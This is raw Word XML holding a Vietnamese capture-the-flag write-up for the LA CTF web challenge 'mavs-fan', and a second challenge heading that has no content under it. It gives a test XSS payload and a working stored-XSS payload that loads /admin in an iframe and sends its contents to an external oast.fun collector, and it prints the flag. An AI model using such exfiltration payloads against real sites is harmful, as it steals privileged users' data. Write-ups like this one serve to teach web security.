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00A0" w14:textId="76F54EA1" w:rsidR="002F49FE" w:rsidRPr="009337A8" w:rsidRDefault="009015DA">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009337A8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 1: mavs-fan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD67DCF" w14:textId="2EA549D7" w:rsidR="009015DA" w:rsidRDefault="009015DA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160E7634" w14:textId="1D9FF102" w:rsidR="009015DA" w:rsidRDefault="00F44E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Challenge cho chúng ta tạo bài viết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEDA94E" w14:textId="039A0428" w:rsidR="00F44E21" w:rsidRDefault="00F44E2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C719A8" wp14:editId="26401608">
            <wp:extent cx="4156710" cy="338458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4" r="30053"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4157330" cy="338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E1E70" w14:textId="3C872C23" w:rsidR="00F44E21" w:rsidRDefault="00F44E21">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28B5172E" w14:textId="32ECAF22" w:rsidR="00F44E21" w:rsidRDefault="003E48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viết không có sàng lọc mã html, javascript nên khai thác XSS rất dễ dàng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C67552" w14:textId="77777777" w:rsidR="0006161E" w:rsidRDefault="0006161E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D076F3D" w14:textId="6D6FCADD" w:rsidR="0006161E" w:rsidRDefault="000616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Mình gửi bài viết sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754F16F0" w14:textId="7C8FC07F" w:rsidR="0006161E" w:rsidRPr="004E7065" w:rsidRDefault="0006161E">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7065">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;img src=1 onerror="alert(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D8D621" w14:textId="77777777" w:rsidR="0006161E" w:rsidRDefault="0006161E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C091B61" w14:textId="05389149" w:rsidR="0006161E" w:rsidRDefault="000616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Payload ở đối tượng Json bị escape dấu nháy đôi</w:t>
      </w:r>
      <w:r w:rsidR="00C13031">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A453B" w14:textId="7F302022" w:rsidR="00C13031" w:rsidRDefault="004A7BA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FA4644" wp14:editId="63423D22">
            <wp:extent cx="28956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FEF" w14:textId="77777777" w:rsidR="004A7BAB" w:rsidRDefault="004A7BAB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BB442F9" w14:textId="4526BE8D" w:rsidR="00745C24" w:rsidRDefault="00A57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Nhưng khi kết xuất html, payload vẫn thực thi được</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A691272" w14:textId="649B5021" w:rsidR="00F144A4" w:rsidRDefault="00F144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14E999" wp14:editId="4C5E9C34">
            <wp:extent cx="38862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E8A4" w14:textId="2756EEE0" w:rsidR="00F144A4" w:rsidRDefault="00F144A4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D16D945" w14:textId="1DF93D70" w:rsidR="00F144A4" w:rsidRDefault="004E7065">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E7065">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ứng dụng xử lí đầu vào không đồng bộ giữa máy khách và máy chủ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8983BC" w14:textId="3E0E2922" w:rsidR="00A575CD" w:rsidRDefault="00A575CD">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404CC8F4" w14:textId="425F575F" w:rsidR="005E035A" w:rsidRDefault="005E03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Chúng ta có thể gửi bài viết </w:t>
      </w:r>
      <w:r w:rsidR="002B70F2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> admin</w:t>
      </w:r>
      <w:r w:rsidR="002B70F2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> duyệt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4951B0" w14:textId="752694CB" w:rsidR="00BB2C8B" w:rsidRDefault="00BB2C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7D40D3" wp14:editId="466FD279">
            <wp:extent cx="3475702" cy="1700323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5" t="8591" r="35591" b="45616"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3477227" cy="1701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4ED64" w14:textId="77777777" w:rsidR="005E035A" w:rsidRDefault="005E035A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EC6C6AC" w14:textId="34C8EBA9" w:rsidR="00F23BA2" w:rsidRDefault="001B41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Nhìn chung, c</w:t>
      </w:r>
      <w:r w:rsidR="004B1FF6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hallenge</w:t>
      </w:r>
      <w:r w:rsidR="00F23BA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> không </w:t>
      </w:r>
      <w:r w:rsidR="004B1FF6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yêu cầu</w:t>
      </w:r>
      <w:r w:rsidR="00F23BA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B1FF6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vượt qua</w:t>
      </w:r>
      <w:r w:rsidR="00F23BA2">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> bộ lọc XSS</w:t>
      </w:r>
      <w:r w:rsidR="004B1FF6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mà</w:t>
      </w:r>
      <w:r w:rsidR="00C35566">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B1FF6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00C35566">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ập trung vào cách lấy flag vì flag không nằm ở cookie của admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041795FC" w14:textId="7A1B9287" w:rsidR="003E482C" w:rsidRDefault="008905C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A3A70CE" wp14:editId="735A40CD">
            <wp:extent cx="5943600" cy="200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3AE9" w14:textId="0BCDA57C" w:rsidR="008905C2" w:rsidRDefault="008905C2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B52394C" w14:textId="138F3647" w:rsidR="008905C2" w:rsidRDefault="008905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 nằm ở trang /admin, nhưng muốn truy cập được trang /admin, cần có admin_secret</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78220EBE" w14:textId="4D9C7DC4" w:rsidR="008905C2" w:rsidRDefault="008905C2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0791B407" w14:textId="6427387D" w:rsidR="008905C2" w:rsidRDefault="00396C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Mục tiêu của chúng ta là tìm tập lệnh Javascript để lấy được flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FAF0048" w14:textId="07AAA114" w:rsidR="00A652E2" w:rsidRDefault="00A652E2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37F2245A" w14:textId="6018C635" w:rsidR="00A652E2" w:rsidRDefault="00A652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Admin_secret không phải là cookie của admin</w:t>
      </w:r>
      <w:r w:rsidR="00BC7A01">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4682A7CF" w14:textId="1D6C792F" w:rsidR="00BC7A01" w:rsidRDefault="00BC7A01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6571B067" w14:textId="0013D760" w:rsidR="00BC7A01" w:rsidRDefault="00BC7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Hướng khai thác: Chỉ có admin mới có admin_secret, chúng ta sẽ nhờ admin duyệt trang /admin, rồi chúng ta lấy nội dung toàn bộ trang /admin chuyển hướng đến máy chủ của kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143A3DF1" w14:textId="196705A5" w:rsidR="00BC7A01" w:rsidRDefault="00BC7A01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="205049D4" w14:textId="1B3030F7" w:rsidR="00BC7A01" w:rsidRDefault="00BC7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Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D33BAA" w14:textId="7857137F" w:rsidR="00BC7A01" w:rsidRPr="0011467D" w:rsidRDefault="00BC7A01">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0011467D">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;iframe src="/admin" onload='document.location="http://gqapsnoypgrztlcpwfuak4jdcxpogewb7.oast.fun/".concat(btoa(encodeURIComponent(this.contentWindow.document.body.innerHTML)))'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F93E91F" w14:textId="28631903" w:rsidR="00BC7A01" w:rsidRDefault="00BC7A01">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67DBA9B3" w14:textId="41F1C4ED" w:rsidR="003D0E3F" w:rsidRPr="00AB41F7" w:rsidRDefault="0011467D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB41F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Flag: </w:t>
      </w:r>
      <w:r w:rsidR="008F1D2E" w:rsidRPr="00AB41F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lactf{m4yb3_w3_sh0u1d_tr4d3_1uk4_f0r_4d}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C7DDA" w14:textId="27151885" w:rsidR="008F1D2E" w:rsidRDefault="008F1D2E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B285A24" w14:textId="14F2ECB3" w:rsidR="003D0E3F" w:rsidRPr="00CE7FA2" w:rsidRDefault="00A70E26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE7FA2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài 2: c</w:t>
      </w:r>
      <w:r w:rsidR="00E45E11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ache</w:t>
      </w:r>
      <w:r w:rsidR="00934B08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E45E11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00934B08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E45E11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00934B08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00E45E11">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222A01FF" w14:textId="77777777" w:rsidR="00A70E26" w:rsidRDefault="00A70E26">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77F4FAA9" w14:textId="0C4124B4" w:rsidR="003D1A91" w:rsidRDefault="003D1A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A29B1E2" w14:textId="77777777" w:rsidR="003D1A91" w:rsidRDefault="003D1A91">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40181D80" w14:textId="7830A02C" w:rsidR="001B418B" w:rsidRDefault="001B418B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C7DAEAB" w14:textId="77777777" w:rsidR="001B418B" w:rsidRDefault="001B418B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FFEC31" w14:textId="0014BB24" w:rsidR="00396C17" w:rsidRDefault="00396C17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="365C156B" w14:textId="77777777" w:rsidR="00396C17" w:rsidRDefault="00396C17">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44445358" w14:textId="77777777" w:rsidR="003E482C" w:rsidRPr="009015DA" w:rsidRDefault="003E482C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="003E482C" w:rsidRPr="00901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8A"/>
    <w:rsid w:val="0006161E"/>
    <w:rsid w:val="0011467D"/>
    <w:rsid w:val="001B418B"/>
    <w:rsid w:val="002B70F2"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="00396C17"/>
    <w:rsid w:val="003D0E3F"/>
    <w:rsid w:val="003D1A91"/>
    <w:rsid w:val="003E482C"/>
    <w:rsid w:val="004A7BAB"/>
    <w:rsid w:val="004B1FF6"/>
    <w:rsid w:val="004E7065"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005E035A"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00745C24"/>
    <w:rsid w:val="007733D6"/>
    <w:rsid w:val="007907EA"/>
    <w:rsid w:val="008905C2"/>
    <w:rsid w:val="008F1D2E"/>
    <w:rsid w:val="009015DA"/>
    <w:rsid w:val="0092757E"/>
    <w:rsid w:val="009337A8"/>
    <w:rsid w:val="00934B08"/>
    <w:rsid w:val="00A575CD"/>
    <w:rsid w:val="00A652E2"/>
    <w:rsid w:val="00A70E26"/>
    <w:rsid w:val="00AB41F7"/>
    <w:rsid w:val="00AC568A"/>
    <w:rsid w:val="00BB2C8B"/>
    <w:rsid w:val="00BC7A01"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C13031"/>
    <w:rsid w:val="00C165F1"/>
    <w:rsid w:val="00C35566"/>
    <w:rsid w:val="00CE7FA2"/>
    <w:rsid w:val="00E45E11"/>
    <w:rsid w:val="00E56F26"/>
    <w:rsid w:val="00F144A4"/>
    <w:rsid w:val="00F23BA2"/>
    <w:rsid w:val="00F4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48099"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{5764189C-6F34-CC49-BDE1-9FB82061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2025-02-10T03:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-12T06:41:00Z</dcterms:modified>
</cp:coreProperties>
</file>